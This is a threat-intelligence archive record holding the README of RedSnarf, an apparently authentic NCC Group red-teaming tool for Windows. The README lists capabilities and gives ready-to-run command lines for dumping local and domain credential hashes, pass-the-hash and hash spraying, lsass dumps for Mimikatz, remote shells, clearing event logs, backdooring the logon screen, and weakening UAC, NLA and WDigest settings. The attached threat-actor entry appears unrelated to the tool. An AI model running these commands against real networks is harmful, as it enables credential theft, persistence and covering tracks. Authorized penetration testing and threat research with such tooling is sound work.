{
	"id": "c2f63d78-37f9-4950-a672-3855249f84af",
	"created_at": "2026-04-06T00:19:14.91705Z",
	"updated_at": "2026-04-10T03:24:30.059764Z",
	"deleted_at": null,
	"sha1_hash": "e6c5983a62ea3d0158df92be03b94e3d68f49c8e",
	"title": "GitHub - nccgroup/redsnarf: RedSnarf is a pen-testing / red-teaming tool for Windows environments",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 62388,
	"plain_text": "GitHub - nccgroup/redsnarf: RedSnarf is a pen-testing / red-teaming tool for Windows environments\r\nBy llandeilocymro\r\nArchived: 2026-04-05 13:57:29 UTC\r\n ______ .____________ _____\r\n\\______ \\ ____ __| _/ _____/ ____ _____ ________/ ____\\\r\n | _// __ \\ / __ |\\_____ \\ / \\\\__ \\\\_ __ \\ __\\\r\n | | \\ ___// /_/ |/ \\ | \\/ __ \\| | \\/| |\r\n |____|_ /\\___ \u003e____ /_______ /___| (____ /__| |__|\r\n \\/ \\/ \\/ \\/ \\/ \\/\r\n redsnarf.ff0000@gmail.com\r\n @redsnarf\r\nlliicceennssee AAppaacchhee--22..00\r\nRedSnarf is a pen-testing / red-teaming tool by Ed Williams for retrieving hashes and credentials from Windows\r\nworkstations, servers and domain controllers using OpSec Safe Techniques.\r\nSee our YouTube Channel for Videos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ\r\nRedSnarf functionality includes:\r\n• Retrieval of local SAM hashes\r\n• Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password;\r\n• Retrieval of MS cached credentials;\r\n• Pass-the-hash;\r\n• Quickly identify weak and guessable username/password combinations (default of administrator/Password01);\r\n• The ability to retrieve hashes across a range;\r\n• Hash spraying -\r\nCredsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space;\r\n• Lsass dump for offline analysis with Mimikatz;\r\n• Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing;\r\n• Dumping of Domain controller hashes using the drsuapi method;\r\n• Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator';\r\n• Ability to decrypt cpassword hashes;\r\n• Ability to start a shell on a remote machine;\r\n• The ability to clear the event logs (application, security, setup or system); (Internal Version only)\r\n• Results are saved on a per-host basis for analysis.\r\n• Enable/Disable RDP on a remote machine.\r\nhttps://github.com/nccgroup/redsnarf\r\nPage 1 of 6\n\n• Change RDP port from 3389 to 443 on a remote machine.\r\n• Enable/Disable NLA on a remote machine.\r\n• Find where users are logged in on remote machines.\r\n• Backdoor Windows Logon Screen\r\n• Enable/Disable UAC on a remote machine.\r\n• Stealth mimikatz added.\r\n• Parsing of domain hashes\r\n• Ability to determine which accounts are enabled/disabled\r\n• Take a screen shot of a Remote logged on Active Users Desktop\r\n• Record Remote logged on Active Users Desktop\r\n• Decrypt Windows CPassword\r\n• Decrypt WinSCP Password\r\n• Get User SPN's\r\n• Retrieve WIFI passwords from remote machines\r\nRedSnarf Usage\r\nRequirements:\r\nImpacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git\r\nCredDump7 - https://github.com/Neohapsis/creddump7\r\nLsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx\r\nNetaddr (0.7.12) - pip install netaddr\r\nTermcolor (1.1.0) - pip install termcolor\r\niconv - used with parsing Mimikatz info locally\r\nShow Help\r\n./redsnarf.py -h\r\n./redsnarf.py --help\r\nRetrieve Local Hashes\r\nRetrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log\r\n./redsnarf.py -H ip=10.0.0.50 -uC security\r\nRetrieve Local Hashes from a single machine using weak local credentials and clearing the application event log\r\n./redsnarf.py -H ip=10.0.0.50 -uC application\r\nRetrieve Local Hashes from a single machine using local administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .\r\nRetrieve Local Hashes from a single machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com\r\nRetrieve Hashes across a network range using local administrator credentials\r\n./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .\r\nhttps://github.com/nccgroup/redsnarf\r\nPage 2 of 6\n\nRetrieve Hashes across a network range using domain administrator credentials\r\n./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com\r\nRetrieve Hashes across a network range using domain administrator credentials\r\n./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com\r\nHash Spraying\r\nSpray Hashes across a network range\r\n./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .\r\nRetrieve Hashes across a network range domain login\r\n./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com\r\nQuickly Check Credentials\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y\r\nQuickly Check File containing usernames (-hS) and a generic password (-hP)\r\n./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y\r\nRetrieve Domain Hashes\r\nRetrieve Hashes using drsuapi method (Quickest)\r\nThis method supports an optional flag of -q y which will query LDAP and output whether accounts are live or\r\ndisabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)\r\nRetrieve Hashes using NTDSUtil\r\nThis method supports an optional flag of -q y which will query LDAP and output whether accounts are live or\r\ndisabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)\r\nGolden Ticket Generation\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y\r\nInformation Gathering\r\nCopy the Policies and Scripts folder from a Domain Controller and parse for password and administrator\r\n./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y\r\nDecrypt Cpassword\r\n./redsnarf.py -uG cpassword\r\nFind User - Live\r\n/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name\r\nFind User - Offline (searches pre downloaded information)\r\n/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name\r\nhttps://github.com/nccgroup/redsnarf\r\nPage 3 of 6\n\nDisplay NT AUTHORITY\\SYSTEM Tasklist\r\n/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y\r\nScreenshot the Desktop of a Remote Logged on Active User\r\n/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y\r\nMisc\r\nStart a Shell on a machine using local administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y\r\nStart a Shell on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y\r\nRetrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y\r\nRun stealth mimikatz, this option fires up a web-server to serve a powershell script, this is obfusctaed and encoded\r\nmachine side, data doesnt touch disk - creds are grepped for in an easy to read style and echoed back to screen.\r\n./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y\r\nRun Custom Command\r\nExample 1\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'\r\nExample 2 - Double Quotes need to be escaped with \\\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -\r\nname \"domain admins\" | dsget group -members -expand'\r\nLocal Access Token Policy\r\nCreates a batch file lat.bat which you can copy and paste to the remote machine to execute which will modify the\r\nregistry and either enable or disable Local Access Token Policy settings.\r\n./redsnarf.py -rL y\r\nWdigest\r\nEnable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e\r\nDisable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d\r\nQuery UseLogonCredential Wdigest registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q\r\nUAC\r\nEnable UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u\r\nadministrator -p Password01 -d yourdomain.com -rU e\r\nhttps://github.com/nccgroup/redsnarf\r\nPage 4 of 6\n\nDisable UAC registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d\r\nQuery UAC registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q\r\nBackdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate\r\nEnable Backdoor registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e\r\nDisable Backdoor registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d\r\nQuery Backdoor registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q\r\nAutoLogon\r\nEnable Windows AutoLogon registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e\r\nDisable Windows AutoLogon registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d\r\nQuery Windows AutoLogon registry value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q\r\nLock a remote machine user session using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y\r\nRDP\r\nEnable RDP on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u\r\nadministrator -p Password01 -d yourdomain.com -rR e\r\nDisable RDP on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d\r\nQuery RDP status on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q\r\nChange RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator\r\ncredentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e\r\nChange RDP Port to default of 3389 on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d\r\nhttps://github.com/nccgroup/redsnarf\r\nPage 5 of 6\n\nQuery RDP Port Value on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q\r\nEnable Multi-RDP with Mimikatz\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y\r\nEnable RDP SingleSessionPerUser on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e\r\nDisable RDP SingleSessionPerUser on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d\r\nQuery RDP SingleSessionPerUser status on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q\r\nNLA\r\nEnable NLA on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e\r\nDisable NLA on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d\r\nQuery NLA status on a machine using domain administrator credentials\r\n./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q\r\nSource: https://github.com/nccgroup/redsnarf\r\nhttps://github.com/nccgroup/redsnarf\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/nccgroup/redsnarf"
	],
	"report_names": [
		"redsnarf"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434754,
	"ts_updated_at": 1775791470,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e6c5983a62ea3d0158df92be03b94e3d68f49c8e.pdf",
		"text": "https://archive.orkl.eu/e6c5983a62ea3d0158df92be03b94e3d68f49c8e.txt",
		"img": "https://archive.orkl.eu/e6c5983a62ea3d0158df92be03b94e3d68f49c8e.jpg"
	}
}